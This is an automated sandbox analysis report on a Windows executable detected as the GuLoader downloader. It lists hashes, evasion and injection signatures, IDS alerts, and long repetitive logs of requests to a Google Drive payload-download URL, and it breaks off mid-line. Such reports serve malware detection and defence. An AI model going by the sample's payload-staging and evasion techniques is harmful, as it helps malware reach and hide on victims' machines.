Windows Analysis Report
TEC-SPC-94.03.60.175.07.exe

Overview

General Information

Sample name: TEC-SPC-94.03.60.175.07.exe
Analysis ID: 1576272
MD5: 01b2b1469623862352f36c9a1d2ca1d5
SHA1: 297d178ed13293b4ca95c731c08bef11266c4998
SHA256: 72a691eae6f31fd6db1c1a5453ac5aad4b8b85d2747c5e668e761eb2e010d02a
Tags: exe, user-Racco42
Infos:

Detection

GuLoader
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • TEC-SPC-94.03.60.175.07.exe (PID: 5820 cmdline: "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe" MD5: 01B2B1469623862352F36C9A1D2CA1D5)
    • TEC-SPC-94.03.60.175.07.exe (PID: 4420 cmdline: "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe" MD5: 01B2B1469623862352F36C9A1D2CA1D5)
  • cleanup

Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

No configs have been found

Source | Rule | Description | Author | Strings
00000002.00000002.3502635941.0000000003614000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000000.00000002.2354906620.0000000006A84000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-16T17:57:36.239478+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49776 | 172.217.19.174 | 443 | TCP

AV Detection

Source: TEC-SPC-94.03.60.175.07.exe, ReversingLabs: Detection: 57%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: TEC-SPC-94.03.60.175.07.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49776 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49784 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49790 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49820 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49843 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49849 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49880 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49909 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49920 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49937 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49950 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49966 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49972 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49995 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:50001 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:50014 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:50022 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:50030 version: TLS 1.2
Source: TEC-SPC-94.03.60.175.07.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe, Code function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004057D0
Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe, Code function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe, Code function: 0_2_00402770 FindFirstFileW,0_2_00402770
Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe, Code function: 2_2_00402770 FindFirstFileW,2_2_00402770
Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe, Code function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_004057D0
Source: C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe, Code function: 2_2_0040628B FindFirstFileW,FindClose,2_2_0040628B
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49776 -> 172.217.19.174:443
Source: global traffic, HTTP traffic detected:
  GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Host: drive.google.com
  Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
  GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Host: drive.google.com
  Cache-Control: no-cache
  Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
Source: global traffic, HTTP traffic detected:
  GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
  Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global trafficHTTP traffic detected: GET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
      Source: global traffic
      DNS traffic detected: DNS query: drive.google.com
      Source: global traffic
      DNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global traffic
      HTTP traffic detected: HTTP/1.1 404 Not Found
      X-GUploader-UploadID: AFiumC7_J-d-kUnNcZJuem94ZrY18AGb6irGmIf4YdlPYqVfSJ5y96NFG_QqOar-QJlWxvzA
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Mon, 16 Dec 2024 16:57:38 GMT
      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Content-Security-Policy: script-src 'nonce-RjjFy2oloISL-BILCeSdbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Cross-Origin-Opener-Policy: same-origin
      Content-Length: 1652
      Server: UploadServer
      Set-Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz; expires=Tue, 17-Jun-2025 16:57:38 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      Content-Security-Policy: sandbox allow-scripts
      Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5mzjZJ1NFRpZh4ZMqh395b73KuHDMHpEgaQDF2vwMLduOaoqCYvlMp_MYG3wjklfY-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:57:44 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-cr-JOXlWaUrE5GZfAAnGbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5nw7cjBzLm7BtzbEOlRDK4FZ7pAF95XnR5_6L8wV-p8HJTgEZa_18U28XVf5s1_vfvContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:57:49 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-FeAwgmcsX4Tmc1sGs1Y0Gg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Sosdq_AGSw5wUv9M5HRx-BKBdm8xImR4rjZnEnaFxetA17cdkb9OyEAiD8YcLOxATContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:57:55 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-0GQwbYS0UpQC8Y0D7-z3Jw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5bUB0kABd5YNamKEYeXgAAr2_8co0-ZS7cngZwnd4-FSUPM28GCusX9jwxKZLQMMIsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:00 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-NK0SWxPBuPpqb3kA5ZGMpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4L9L_5xGIOBGxGvzwlgDuEV4sAUuS5KMFzRHVyZP3o7EVe1bHCElAeMdUyCGbR4kdTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:58:06 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-mV48Bs3rtx-9UWh8K119sw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js 